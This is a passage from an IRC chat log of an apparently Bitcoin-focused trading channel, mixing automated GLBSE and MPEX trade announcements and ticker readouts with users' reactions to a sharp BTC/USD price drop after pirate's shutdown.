1.1201 = 5.6005 BTC [+] Aug 17 22:11:52 [GLBSE] [PPT.B] 7 @ 1.12 = 7.84 BTC [-] Aug 17 22:11:52 [GLBSE] [PPT.B] 10 @ 1.115 = 11.15 BTC [-] Aug 17 22:12:05 [GLBSE] [PPT.DIV] 39 @ 0.3 = 11.7 BTC [-] Aug 17 22:12:18 someone getting out Aug 17 22:12:21 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.41788873 = 417.8887 BTC [-] Aug 17 22:12:26 as word spreads Aug 17 22:12:30 [GLBSE] [TYGRR.BOND-P] 1 @ 0.749 BTC [-] Aug 17 22:12:31 and more puts Aug 17 22:13:05 i think people are getting real antsy about btc/usd atm Aug 17 22:13:23 i wonder what the fallout scenarios are if pirate is never heardfrom again. Aug 17 22:13:49 [GLBSE] [ASICMINER] 14 @ 0.105 = 1.47 BTC [+] Aug 17 22:14:28 [GLBSE] [GIPPT] 7 @ 0.96 = 6.72 BTC [-] Aug 17 22:14:37 i've been realy antsy about btc/usd for a while now Aug 17 22:14:49 [GLBSE] [TEEK.USD] 25 @ 0.068 = 1.7 BTC [-] Aug 17 22:14:50 it's why i have a delta neutral position, overall Aug 17 22:15:17 > mircea_popescu: i wonder what the fallout scenarios are if pirate is never heardfrom again. Aug 17 22:15:23 economically speaking Aug 17 22:15:28 the damage as already happened Aug 17 22:15:35 the money removed from the economy Aug 17 22:15:37 between mpex and some other choice things, i make btc up, down and sideways Aug 17 22:15:42 ya but people haven't realised it yet. Aug 17 22:15:44 eventually to be re-instroduced Aug 17 22:15:57 smickles haha do you daytrade on mpex ? Aug 17 22:16:06 not really Aug 17 22:16:16 i do most of my stuff at the beginning of the month Aug 17 22:18:04 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.49513636 = 495.1364 BTC [-] Aug 17 22:18:12 i did, however buy some C100T at a good price Aug 17 22:18:30 Maybe now peopple will invest in mining! Aug 17 22:18:43 [GLBSE] [TYGRR.BOND-P] 5 @ 0.75 = 3.75 BTC [+] Aug 17 22:19:05 usagi: you sly dog Aug 17 22:19:09 lol Aug 17 22:19:09 it was you all along Aug 17 22:19:12 lol Aug 17 22:19:21 usagi got really excited earlier :D Aug 17 22:19:35 I've been waiting for this Aug 17 22:19:48 Now I will finally be able to prove CPA is for real Aug 17 22:19:53 [GLBSE] [DMC] 2 @ 0.048 = 0.096 BTC [+] Aug 17 22:20:19 [MPEX] [O.BTCUSD.P140T] 4 @ 0.10677196 = 0.4271 BTC [-] Aug 17 22:20:20 you think he will dfault? Aug 17 22:20:21 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 22:20:30 [GLBSE] [GIGAMINING] 1 @ 1.01899998 BTC [+] Aug 17 22:20:42 Who know Aug 17 22:20:46 Who knows Aug 17 22:20:53 volume is picking up on gox Aug 17 22:20:57 Nefario: What was me all along? Aug 17 22:21:24 I actually had a theory that pirate defaulted because people were withdrawing from direct accounts and buying YARR and other issues Aug 17 22:21:37 ;;ticker Aug 17 22:21:37 Best bid: 13.827, Best ask: 13.8648, Bid-ask spread: 0.03780, Last trade: 13.827, 24 hour volume: 109753, 24 hour low: 13.2, 24 hour high: 15.4 Aug 17 22:21:56 [GLBSE] [TYGRR.BOND-P] 12 @ 0.75 = 9 BTC [+] Aug 17 22:22:10 [GLBSE] [BIB.PIRATE] 1 @ 0.9 BTC [-] Aug 17 22:22:57 [MPEX] [O.BTCUSD.P090T] 13 @ 0.03538231 = 0.46 BTC [-] Aug 17 22:23:05 sweet shit Aug 17 22:23:19 i just sold those at 10x what i thought they were worth Aug 17 22:23:31 the puts ? Aug 17 22:23:37 po90t Aug 17 22:23:43 Seriously people selling -P for 0.75 are insane Aug 17 22:26:02 [GLBSE] [TYGRR.BOND-P] 10 @ 0.7 = 7 BTC [-] Aug 17 22:26:03 [GLBSE] [TYGRR.BOND-P] 10 @ 0.502 = 5.02 BTC [-] Aug 17 22:26:04 [GLBSE] [TYGRR.BOND-P] 10 @ 0.501 = 5.01 BTC [-] Aug 17 22:26:06 [GLBSE] [TYGRR.BOND-P] 1 @ 0.5 BTC [-] Aug 17 22:26:07 [GLBSE] [TYGRR.BOND-P] 9 @ 0.4 = 3.6 BTC [-] Aug 17 22:26:08 [GLBSE] [TYGRR.BOND-P] 10 @ 0.3 = 3 BTC [-] Aug 17 22:26:39 [MPEX] [S.MPOE] 32472 @ 0.00037193 = 12.0773 BTC [-] Aug 17 22:26:46 [GLBSE] [PPT.A] 1 @ 1 BTC [-] Aug 17 22:27:13 .7 to .3? Aug 17 22:27:17 wowza Aug 17 22:28:17 [GLBSE] [OBSI.HRPT] 3 @ 0.076 = 0.228 BTC [-] Aug 17 22:28:18 [GLBSE] [OBSI.HRPT] 4 @ 0.075 = 0.3 BTC [-] Aug 17 22:28:19 [GLBSE] [OBSI.HRPT] 3 @ 0.071 = 0.213 BTC [-] Aug 17 22:28:38 ppt crash on glbse, read all about it Aug 17 22:28:49 stupid Aug 17 22:29:02 yeah Aug 17 22:29:07 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [-] Aug 17 22:29:08 [GLBSE] [ASICMINER] 9 @ 0.1 = 0.9 BTC [-] Aug 17 22:29:13 so in the end glbse investments are of two kinds : Aug 17 22:29:25 miner bonds, where you make a little each month and lose 2x from your capital same month Aug 17 22:29:31 hehe Aug 17 22:29:42 and pirate bonds, where you make more each month and lose most of your capital in three month intervals Aug 17 22:29:45 [GLBSE] [PPT.A] 1 @ 0.95 BTC [-] Aug 17 22:29:51 seems very investor-y. Aug 17 22:29:56 [GLBSE] [ASICMINER] 66 @ 0.105 = 6.93 BTC [+] Aug 17 22:29:57 mircea_popescu: ahem Aug 17 22:29:58 [GLBSE] [ASICMINER] 4 @ 0.105 = 0.42 BTC [+] Aug 17 22:30:00 [GLBSE] [TEEK.USD] 3 @ 0.068 = 0.204 BTC [-] Aug 17 22:30:22 smickles did i leave something out ? Aug 17 22:30:27 Yes you did Aug 17 22:30:30 a couple of small gems Aug 17 22:30:36 You should take a look at what NYAN.B invests in Aug 17 22:30:46 well of course i left things out, i was being mean. Aug 17 22:30:49 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 22:30:50 NYAN.B only invests in non-mining, non-pirate securities Aug 17 22:30:58 usagi those exist ? Aug 17 22:31:03 It sounded ill-informed Aug 17 22:31:26 [GLBSE] [CBGB] 1 @ 0.5 BTC [+] Aug 17 22:31:35 cbgb? lol Aug 17 22:31:37 [GLBSE] [PPT.D] 1 @ 1.2301 BTC [+] Aug 17 22:31:38 waht a name Aug 17 22:31:38 [GLBSE] [PPT.D] 5 @ 1.2211 = 6.1055 BTC [-] Aug 17 22:31:39 [GLBSE] [PPT.D] 2 @ 1.2201 = 2.4402 BTC [-] Aug 17 22:31:40 whoa look at that! Aug 17 22:31:40 [GLBSE] [PPT.D] 10 @ 1 = 10 BTC [-] Aug 17 22:31:41 ;;ticker Aug 17 22:31:42 Best bid: 13.35, Best ask: 13.35001, Bid-ask spread: 0.00001, Last trade: 13.35, 24 hour volume: 115247, 24 hour low: 13.17524, 24 hour high: 15.4 Aug 17 22:31:52 oh Aug 17 22:32:01 maybe i sold those puts too soon Aug 17 22:32:15 [GLBSE] [OBSI.HRPT] 35 @ 0.05 = 1.75 BTC [-] Aug 17 22:32:17 [MPEX] [O.BTCUSD.P130T] 10 @ 0.07093232 = 0.7093 BTC [-] Aug 17 22:32:19 i'll laugh if they end up itm Aug 17 22:32:28 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.50485713 = 504.8571 BTC [+] Aug 17 22:32:38 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.42683066 = 426.8307 BTC [+] Aug 17 22:32:59 pirate is manipulating the price down Aug 17 22:33:10 so he can buy cheap coins to pay people off Aug 17 22:33:19 conspiracy! Aug 17 22:33:20 [MPEX] [O.BTCUSD.P180T] 1000 @ 0.35169001 = 351.69 BTC [+] Aug 17 22:33:23 !! Aug 17 22:34:06 it's difficult to get a trade page on glbse Aug 17 22:34:13 the boxes don't show up :< Aug 17 22:34:17 gotta reload 2 or 3 times Aug 17 22:34:29 jeez. Aug 17 22:34:39 ok, i am guessing the bubble is popping huh Aug 17 22:35:17 [GLBSE] [GIGAMINING] 31 @ 0.99 = 30.69 BTC [-] Aug 17 22:35:41 wowza giga under 12 Aug 17 22:35:42 1* Aug 17 22:35:46 [MPEX] [S.MPOE] 18326 @ 0.00038089 = 6.9802 BTC [+] Aug 17 22:35:48 ok, this is a clearly massive selloff. Aug 17 22:36:25 [GLBSE] [TYGRR.BOND-P] 1 @ 0.74999999 BTC [+] Aug 17 22:36:27 [GLBSE] [PPT.E] 1 @ 1.2499 BTC [-] Aug 17 22:36:28 [GLBSE] [PPT.E] 1 @ 1.25 BTC [+] Aug 17 22:36:47 [GLBSE] [FOO.PPPPT] 9 @ 0.2 = 1.8 BTC [-] Aug 17 22:37:11 [GLBSE] [TEEK.USD] 20 @ 0.068 = 1.36 BTC [-] Aug 17 22:38:28 ;;ticker Aug 17 22:38:29 Best bid: 12.80817, Best ask: 13, Bid-ask spread: 0.19183, Last trade: 12.8, 24 hour volume: 122466, 24 hour low: 12.8, 24 hour high: 15.4 Aug 17 22:38:33 o wow. Aug 17 22:39:03 under 13. Aug 17 22:39:04 what a day. Aug 17 22:40:15 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 22:40:54 indeed Aug 17 22:40:59 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.43493314 = 434.9331 BTC [+] Aug 17 22:41:31 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.51365024 = 513.6502 BTC [+] Aug 17 22:42:15 mmm i think that's over 5k btc worth of puts for the day. Aug 17 22:42:16 crazy. Aug 17 22:43:50 [GLBSE] [BITCOINMINV] 1 @ 0.11 BTC [-] Aug 17 22:44:37 [MPEX] [F.GIGA.ETF] 5500 @ 0.00093777 = 5.1577 BTC [+] Aug 17 22:44:38 and i was getting all geared up to add strikes 20-30 Aug 17 22:44:39 [MPEX] [F.GIGA.ETF] 2301 @ 0.00093603 = 2.1538 BTC [-] Aug 17 22:44:48 mee too Aug 17 22:44:52 sux. Aug 17 22:45:06 maybe another month Aug 17 22:45:28 you should lay down a C1000N, just for the fuck of it Aug 17 22:45:45 [MPEX] [O.BTCUSD.C200T] 4 @ 0.02857462 = 0.1143 BTC [+] Aug 17 22:45:46 [MPEX] [O.BTCUSD.C200T] 22 @ 0.02422959 = 0.5331 BTC [-] Aug 17 22:45:47 [MPEX] [O.BTCUSD.C200T] 974 @ 0.00530545 = 5.1675 BTC [-] Aug 17 22:45:55 [GLBSE] [TEEK.USD] 6 @ 0.068 = 0.408 BTC [-] Aug 17 22:46:10 haha yeah Aug 17 22:46:29 volume is 7% above average on gox already Aug 17 22:46:43 that's not so much... you mean daily vol ? Aug 17 22:46:48 yeah Aug 17 22:47:08 26day average Aug 17 22:47:19 it's the bitcoincharts pvo Aug 17 22:50:01 ;;ticker Aug 17 22:50:02 Best bid: 12.49501, Best ask: 12.5, Bid-ask spread: 0.00499, Last trade: 12.5, 24 hour volume: 130540, 24 hour low: 12.5, 24 hour high: 15.4 Aug 17 22:50:06 under 12.5 Aug 17 22:50:25 and volume isn't that great i'd say. Aug 17 22:50:29 130k, what's that. Aug 17 22:50:39 panic sale Aug 17 22:50:46 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 22:50:55 and then it turns around and off it is Aug 17 22:51:42 [GLBSE] [OBSI.HRPT] 143 @ 0.099 = 14.157 BTC [+] Aug 17 22:51:44 [GLBSE] [OBSI.HRPT] 90 @ 0.099 = 8.91 BTC [+] Aug 17 22:51:45 [GLBSE] [OBSI.HRPT] 57 @ 0.09999999 = 5.7 BTC [+] Aug 17 22:51:59 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.52256474 = 522.5647 BTC [+] Aug 17 22:52:37 people must really think pirate is not going to pay back Aug 17 22:53:02 [GLBSE] [GIGAMINING] 51 @ 0.99 = 50.49 BTC [-] Aug 17 22:53:28 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.44315548 = 443.1555 BTC [+] Aug 17 22:54:02 well... some people for sure do. Aug 17 22:54:09 [GLBSE] [TYGRR.BOND-P] 10 @ 0.6998 = 6.998 BTC [-] Aug 17 22:54:34 heh, you wanted ppl to buy some puts Aug 17 22:54:48 lol srsly. Aug 17 22:55:11 it spun me around, i was -3k on puts now i think im more like +3k Aug 17 22:55:33 ;;bc,24hprc Aug 17 22:55:34 14.19 Aug 17 22:55:45 yeah that's dropping fast. Aug 17 22:56:02 ;;ticker Aug 17 22:56:03 Best bid: 12.269, Best ask: 12.35, Bid-ask spread: 0.08100, Last trade: 12.3981, 24 hour volume: 132153, 24 hour low: 12.269, 24 hour high: 15.4 Aug 17 22:56:11 o wow Aug 17 22:56:16 under 10 ? Aug 17 22:56:27 [GLBSE] [NYAN.C] 3 @ 1 = 3 BTC [-] Aug 17 22:56:31 damn, why are bank wires so slow Aug 17 22:56:35 lol Aug 17 22:57:28 because moneyisdaith Aug 17 22:57:43 [GLBSE] [TYGRR.BOND-P] 17 @ 0.5 = 8.5 BTC [-] Aug 17 22:58:29 [MPEX] [S.MPOE] 21600 @ 0.00038174 = 8.2456 BTC [+] Aug 17 22:58:31 [MPEX] [S.MPOE] 3826 @ 0.00038275 = 1.4644 BTC [+] Aug 17 22:58:32 [MPEX] [S.MPOE] 24974 @ 0.00038517 = 9.6192 BTC [+] Aug 17 22:59:01 [GLBSE] [CPA] 15 @ 0.08 = 1.2 BTC [-] Aug 17 22:59:34 [GLBSE] [TYGRR.BOND-P] 10 @ 0.6 = 6 BTC [+] Aug 17 23:00:08 ;;ticker Aug 17 23:00:17 .6 holy shit Aug 17 23:00:27 Error: Failure to retrieve ticker. Try again later. Aug 17 23:00:27 buy them back Aug 17 23:00:28 [MPEX] [O.BTCUSD.P130T] 1 @ 0.08287774 BTC [+] Aug 17 23:00:31 buy them back Aug 17 23:00:33 ;;ticker Aug 17 23:00:44 Best bid: 11.87601, Best ask: 12, Bid-ask spread: 0.12399, Last trade: 11.87601, 24 hour volume: 147383, 24 hour low: 11.45, 24 hour high: 15.4 Aug 17 23:00:57 o m f g. Aug 17 23:01:05 ;;bid 10 Aug 17 23:01:06 Error: "bid" is not a valid command. Aug 17 23:01:26 [GLBSE] [NYAN.C] 3 @ 1 = 3 BTC [-] Aug 17 23:01:31 ;;bids 10 Aug 17 23:01:32 There are currently 21613.255 bitcoins demanded at or over 10.0 USD, worth 232063.966674 USD in total. Aug 17 23:01:47 a ty Aug 17 23:01:58 20k over 10 huh ? we might see 9. Aug 17 23:02:35 ;;ticker Aug 17 23:02:35 Best bid: 11.579, Best ask: 12, Bid-ask spread: 0.42100, Last trade: 12, 24 hour volume: 148079, 24 hour low: 11.4, 24 hour high: 15.4 Aug 17 23:02:46 lol, on the day i decide to sell my puts struck at 9 Aug 17 23:02:50 Bid-ask spread: 0.42100 0.0 Aug 17 23:03:11 [GLBSE] [TYGRR.BOND-P] 20 @ 0.59999 = 11.9998 BTC [-] Aug 17 23:03:13 [GLBSE] [TYGRR.BOND-P] 5 @ 0.6 = 3 BTC [+] Aug 17 23:03:20 mtgox has turned into wannabitexchange :D Aug 17 23:03:22 ah well, i got a good price for 'em, we'd have to actually drop below 9 for that to hurt Aug 17 23:03:28 [GLBSE] [NYAN.C] 1 @ 1 BTC [-] Aug 17 23:04:46 and it was only 13 of 'em Aug 17 23:04:54 pity that people have this run from btc "investment" all the way to usd mentality. Aug 17 23:05:20 ;;ticker Aug 17 23:05:22 Best bid: 11.35, Best ask: 11.6, Bid-ask spread: 0.25000, Last trade: 11.35, 24 hour volume: 150600, 24 hour low: 11.35, 24 hour high: 15.4 Aug 17 23:05:36 [GLBSE] [PUREMINING] 2 @ 0.14 = 0.28 BTC [-] Aug 17 23:05:38 last trade 11.35 Aug 17 23:05:39 [GLBSE] [PUREMINING] 1 @ 0.14 BTC [-] Aug 17 23:06:38 ima go watch a film or something, this is too much. Aug 17 23:07:02 how can you watch a movie while dis is happenin Aug 17 23:07:16 kakobreklaa a tit in each hand. Aug 17 23:07:16 its a day to remember Aug 17 23:07:17 best movie ever right here Aug 17 23:07:57 [GLBSE] [TYGRR.BOND-P] 2 @ 0.6 = 1.2 BTC [+] Aug 17 23:08:10 Can't get a trade screen to open on glbse Aug 17 23:08:29 [MPEX] [O.BTCUSD.P080T] 10 @ 0.05127951 = 0.5128 BTC [+] Aug 17 23:08:30 Nefario, any idea how many people are using GLBSE atm? Aug 17 23:09:27 the glbse server is on fire, nef won't answer b/c he's putting itout Aug 17 23:09:40 [GLBSE] [JAH] 75 @ 0.12 = 9 BTC [-] Aug 17 23:09:54 nef is puttin' one out ehh Aug 17 23:10:12 [GLBSE] [PPT.DIV] 10 @ 0.51999 = 5.1999 BTC [+] Aug 17 23:10:23 I can imagine.. everyone with an account must be there now Aug 17 23:11:00 ;;tslb Aug 17 23:11:02 Time since last block: 23 minutes and 0 seconds Aug 17 23:12:20 [GLBSE] [BIB.PIRATE] 9 @ 0.9 = 8.1 BTC [-] Aug 17 23:13:19 [GLBSE] [YARR] 1 @ 0.81000001 BTC [-] Aug 17 23:13:42 lol yarr at .81 Aug 17 23:14:41 [GLBSE] [TYGRR.BOND-P] 10 @ 0.61 = 6.1 BTC [+] Aug 17 23:14:43 [GLBSE] [TYGRR.BOND-P] 36 @ 0.6 = 21.6 BTC [-] Aug 17 23:14:53 [GLBSE] [COGNITIVE] 1 @ 0.63 BTC [-] Aug 17 23:15:21 [GLBSE] [TYGRR.BOND-P] 1 @ 0.68 BTC [+] Aug 17 23:15:25 how much bitcoin was dumped in total just now? Aug 17 23:15:54 [MPEX] [F.GIGA.ETF] 7916 @ 0.00095449 = 7.5557 BTC [+] Aug 17 23:16:20 [GLBSE] [OBSI.HRPT] 17 @ 0.09999999 = 1.7 BTC [+] Aug 17 23:16:49 [GLBSE] [YARR] 12 @ 0.81 = 9.72 BTC [-] Aug 17 23:17:08 a lot Aug 17 23:17:20 other channel said over 50k Aug 17 23:17:29 wait, didn't usagi say yar was worth 1 regardless of a pirate default? Aug 17 23:17:40 yup Aug 17 23:17:47 Someone's being stupid Aug 17 23:17:55 did pirate default? Aug 17 23:18:02 do not sell yarr under 1 Aug 17 23:18:03 nope Aug 17 23:18:05 [GLBSE] [TEEK.USD] 10 @ 0.074 = 0.74 BTC [+] Aug 17 23:18:13 Diablo-D3: pirate shutdown Aug 17 23:18:22 so he just quit instead? Aug 17 23:18:26 yup Aug 17 23:18:34 gonna return the principle Aug 17 23:18:38 but hes still paying out the final week? Aug 17 23:18:42 yup Aug 17 23:18:53 okay, thats fine Aug 17 23:18:59 where's it say that? Aug 17 23:19:10 his bs&t post Aug 17 23:19:25 he says he will pay interest up until the funds are sent Aug 17 23:19:36 I'm putting in supporting bids for YARR as we speak but GLBSE is slow Aug 17 23:19:58 jesus glbse is slow Aug 17 23:19:59 ok, time to pay the SS dividend Aug 17 23:20:08 btw for all the people who give fucks Aug 17 23:20:24 the DMC motion to suspend dividends was yea 8253, nay 914 Aug 17 23:21:02 [GLBSE] [TYGRR.BOND-P] 10 @ 0.6 = 6 BTC [-] Aug 17 23:22:59 [GLBSE] [NYAN.A] 90 @ 1 = 90 BTC [-] Aug 17 23:23:15 [MPEX] [S.MPOE] 8900 @ 0.00038517 = 3.428 BTC [+] Aug 17 23:25:13 so just to be clear, yarr won't go above 1 now? Aug 17 23:27:50 ;;tslb Aug 17 23:27:52 Time since last block: 39 minutes and 50 seconds Aug 17 23:28:24 errybody shut down their miners Aug 17 23:32:21 [GLBSE] [GIPPT] 10 @ 0.96 = 9.6 BTC [-] Aug 17 23:34:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.5 BTC [-] Aug 17 23:35:13 [GLBSE] [JAH] 37 @ 0.12 = 4.44 BTC [-] Aug 17 23:35:17 [GLBSE] [TEEK.USD] 26 @ 0.074 = 1.924 BTC [+] Aug 17 23:35:19 [GLBSE] [TEEK.USD] 5 @ 0.0745 = 0.3725 BTC [+] Aug 17 23:35:20 [GLBSE] [TEEK.USD] 2 @ 0.074999 = 0.15 BTC [+] Aug 17 23:37:11 ;;ticker Aug 17 23:37:11 Best bid: 12, Best ask: 12.09998, Bid-ask spread: 0.09998, Last trade: 12, 24 hour volume: 181801, 24 hour low: 10.6, 24 hour high: 15.4 Aug 17 23:39:21 >low Aug 17 23:39:22 >high Aug 17 23:39:23 :3 Aug 17 23:39:43 aha so a bottom is in huh Aug 17 23:40:07 please fill my low ass bids of .4 on my P bonds, hehehe Aug 17 23:40:11 ;;tslb Aug 17 23:40:13 Time since last block: 52 minutes and 11 seconds Aug 17 23:40:17 oh lol Aug 17 23:40:19 wowza Aug 17 23:40:24 yeah that sucks Aug 17 23:40:25 no wai ?! Aug 17 23:40:45 i guess the miners stopped too? Aug 17 23:40:51 i bet that next block has soooo many transactions Aug 17 23:40:57 so when this block finally goes through and all the btc makes it to mtgox Aug 17 23:40:59 we see round 2 ? Aug 17 23:41:08 maybe Aug 17 23:41:29 are there live stats on the network hashrate? Aug 17 23:41:34 ;;bc,stats Aug 17 23:41:36 Current Blocks: 194368 | Current Difficulty: 2190865.9701029 | Next Difficulty At Block: 195551 | Next Difficulty In: 1183 blocks | Next Difficulty In About: 1 week, 0 days, 15 hours, 2 minutes, and 11 seconds | Next Difficulty Estimate: 2364194.91326944 | Estimated Percent Change: 7.91143527408 Aug 17 23:41:42 wonder if miners can frontrun mtgox this way Aug 17 23:41:44 meh, not that Aug 17 23:42:12 ;;ticker Aug 17 23:42:13 Best bid: 12.34062, Best ask: 12.436, Bid-ask spread: 0.09538, Last trade: 12.34062, 24 hour volume: 184763, 24 hour low: 10.6, 24 hour high: 15.4 Aug 17 23:42:19 mircea_popescu: Are the options quotes on MPeX still valid for orders? I.e. arbitrage buy selling puts and buying at market is profitable right now? Aug 17 23:42:26 ;;nodes Aug 17 23:42:26 Error: "nodes" is not a valid command. Aug 17 23:42:33 >2700 unconfirmed txes Aug 17 23:42:33 ''node Aug 17 23:43:00 option quotes are still valid, yes. Aug 17 23:43:03 sgornick: mpex uses the ,,bc,24hprc , but yes Aug 17 23:43:12 if you can arbitrage go ahead Aug 17 23:43:14 ;;bc,24hprc Aug 17 23:43:15 13.47 Aug 17 23:43:46 MoneyIsDebt im sure they can, thing is... have to get enough of themn on the bandwagon Aug 17 23:43:54 Wow someone bought 20000 btc Aug 17 23:44:17 Dont think ive ever seen a puchase that big Aug 17 23:44:24 im sure i have. Aug 17 23:44:50 [GLBSE] [TYGRR.BOND-P] 1 @ 0.5999 BTC [+] Aug 17 23:45:16 [MPEX] [O.BTCUSD.C200T] 1000 @ 0.0509 = 50.9 BTC [+] Aug 17 23:45:17 btw sgornick Aug 17 23:45:28 is that bitpaste thing dead ? Aug 17 23:45:41 I thought you were watching a movie while holding some tits mircea_popescu Aug 17 23:45:46 :) Aug 17 23:45:47 [GLBSE] [FOO.PPPPT] 3 @ 0.335 = 1.005 BTC [+] Aug 17 23:45:52 Doffx: i say a 70k order go thru the mtgox websocket once Aug 17 23:45:53 bobby deerfield. it turned out boring. Aug 17 23:45:54 mircea_popescu: http://bitbin.it ? Aug 17 23:46:00 o. you said .net Aug 17 23:46:06 doh! Aug 17 23:46:16 lol. Aug 17 23:46:23 20k during this volatility is interesting though Aug 17 23:46:36 btccharts looks like a heartrate monitor during cardiac arrest Aug 17 23:46:39 especially when the pressure is to sell Aug 17 23:46:46 that 70k was what stopped us from going over 7.2 at the time Aug 17 23:46:58 Doffx: pirate needs to buy probably Aug 17 23:47:02 it was like, ... BLAMO Aug 17 23:47:03 btccharts looks like a heartrate monitor during cardiac arrest <<< Aug 17 23:47:22 wow Aug 17 23:47:41 ;;ticker Aug 17 23:47:41 Best bid: 12.90513, Best ask: 13, Bid-ask spread: 0.09487, Last trade: 13, 24 hour volume: 192033, 24 hour low: 10.6, 24 hour high: 15.4 Aug 17 23:48:01 aha it's coming back to life huh Aug 17 23:48:03 MoneyIsDebt: add that chart to the blockchain.info new transactions 'beep' Aug 17 23:48:15 http://blockchain.info/unconfirmed-transactions Aug 17 23:48:16 yeah it went up after that 22k purchase Aug 17 23:48:19 smickles: oh man , I forgot about the beeps Aug 17 23:48:30 it's going wild right now Aug 17 23:48:32 [GLBSE] [NYAN.A] 25 @ 1 = 25 BTC [-] Aug 17 23:48:42 almost 60 bpm Aug 17 23:48:46 [GLBSE] [BIB.PIRATE] 1 @ 0.285 BTC [-] Aug 17 23:48:49 if i judge it correctly Aug 17 23:49:01 mircea_popescu: and it's not all 1dice Aug 17 23:49:07 ok, totally wrong about that, it's way over 60 Aug 17 23:49:12 sorry that was for smickles Aug 17 23:49:26 it's no 1dice as i see it Aug 17 23:49:35 bib.pirate at .285???/ Aug 17 23:49:57 Total Size 1010.8603515625 (kilobytes) Aug 17 23:50:08 Total Fees 0.68525198 BTC Aug 17 23:50:10 so unfair,. Aug 17 23:51:00 [GLBSE] [SATOSHISDAEMON.HORSE] 2 @ 0.21 = 0.42 BTC Aug 17 23:51:17 wow Aug 17 23:51:23 [MPEX] [O.BTCUSD.C200T] 892 @ 0.0510375 = 45.5255 BTC [+] Aug 17 23:51:42 i think i just saw a 10k btc tx zing by the unconfirmed ticker Aug 17 23:51:59 was it going to mtgox ? Aug 17 23:52:02 the beeps may as well be a constant tone Aug 17 23:52:18 mircea_popescu: i have no idea, and it's prolly 12 pages down now Aug 17 23:52:36 [GLBSE] [BIB.PIRATE] 4 @ 0.8 = 3.2 BTC [+] Aug 17 23:52:42 ;;ticker Aug 17 23:52:43 Best bid: 12.96, Best ask: 12.99359, Bid-ask spread: 0.03359, Last trade: 12.96, 24 hour volume: 193198, 24 hour low: 10.6, 24 hour high: 15.4 Aug 17 23:52:56 ;;tslb Aug 17 23:53:03 Time since last block: 9 minutes and 53 seconds Aug 17 23:53:10 aha it cleared. Aug 17 23:53:17 and 1 other Aug 17 23:53:25 heh, there's still a few 1dice in there... as if things weren't enough of a gamble at this point Aug 17 23:53:25 ;;ticker Aug 17 23:53:25 Best bid: 13.00001, Best ask: 13.2, Bid-ask spread: 0.19999, Last trade: 13.2988, 24 hour volume: 193338, 24 hour low: 10.6, 24 hour high: 15.4 Aug 17 23:53:32 whee Aug 17 23:53:34 but the S²cm dividend wasn't included in either Aug 17 23:54:24 [GLBSE] [PPT.DIV] 185 @ 0.3 = 55.5 BTC [-] Aug 17 23:54:26 [GLBSE] [PPT.DIV] 230 @ 0.285 = 65.55 BTC [-] Aug 17 23:54:43 [GLBSE] [PIMP] 1 @ 0.01 BTC [-] Aug 17 23:55:38 [MPEX] [S.MPOE] 715 @ 0.00038089 = 0.2723 BTC [-] Aug 17 23:55:40 [MPEX] [S.MPOE] 5387 @ 0.00037661 = 2.0288 BTC [-] Aug 17 23:55:41 [MPEX] [S.MPOE] 9098 @ 0.00037653 = 3.4257 BTC [-] Aug 17 23:56:12 [GLBSE] [TYGRR.BOND-P] 1 @ 0.5999 BTC [+] Aug 17 23:57:22 [GLBSE] [BIB.PIRATE] 20 @ 0.2851 = 5.702 BTC [-] Aug 17 23:58:32 Man if you had an arbitrage bot running today Aug 17 23:59:14 usagi: so Aug 17 23:59:18 now I have to wait until the 19th Aug 18 00:00:53 [GLBSE] [FOO.PPPPT] 15 @ 0.3351 = 5.0265 BTC [+] Aug 18 00:01:33 [GLBSE] [PPT.A] 5 @ 1.15 = 5.75 BTC [+] Aug 18 00:03:27 I have a arbitrage bot running ^^ Aug 18 00:03:51 made much? Aug 18 00:03:56 [MPEX] [O.BTCUSD.C050T] 77 @ 0.63041457 = 48.5419 BTC [-] Aug 18 00:04:02 To be honest, the way it's bouncing around, even a market-maker bot will be doing pretty okay Aug 18 00:04:10 [GLBSE] [TYGRR.BOND-P] 10 @ 0.5 = 5 BTC [-] Aug 18 00:04:36 [GLBSE] [OBSI.HRPT] 1 @ 0.055 BTC [-] Aug 18 00:05:11 DeaDTerra: btw Aug 18 00:05:18 DeaDTerra: if you end up with any 1mh bonds you dont want Aug 18 00:05:22 I will take them off your hands Aug 18 00:05:55 round 2 might be begining now Aug 18 00:06:31 infact, if ANYONE has any Aug 18 00:06:33 I will buy them Aug 18 00:06:39 I will not pay much for them, but I will buy them Aug 18 00:07:10 [GLBSE] [BIB.PIRATE] 10 @ 0.50000001 = 5 BTC [+] Aug 18 00:07:22 wat Aug 18 00:07:28 why buy pirate now?! Aug 18 00:07:46 ;;bids 10 Aug 18 00:07:47 There are currently 25720.459 bitcoins demanded at or over 10.0 USD, worth 283001.05594 USD in total. Aug 18 00:08:28 [GLBSE] [TYGRR.BOND-P] 4 @ 0.441 = 1.764 BTC [-] Aug 18 00:08:45 to trade for 1mh bonds, Diablo-D3 Aug 18 00:08:53 lol Aug 18 00:08:56 ;;ticker Aug 18 00:08:56 Best bid: 13.01, Best ask: 13.1, Bid-ask spread: 0.09000, Last trade: 13, 24 hour volume: 200654, 24 hour low: 10.6, 24 hour high: 15.4 Aug 18 00:09:21 [GLBSE] [FOO.PPPPT] 1 @ 0.5 BTC [+] Aug 18 00:09:29 4.8 dollars day's spread lmap Aug 18 00:10:23 [GLBSE] [OBSI.HRPT] 110 @ 0.051 = 5.61 BTC [-] Aug 18 00:11:18 icbit futures are going for 12.85 Aug 18 00:14:09 [GLBSE] [FOO.PPPPT] 9 @ 0.5 = 4.5 BTC [+] Aug 18 00:15:21 as i said Aug 18 00:15:24 ;;ticker Aug 18 00:15:24 Best bid: 12.0301, Best ask: 12.76002, Bid-ask spread: 0.72992, Last 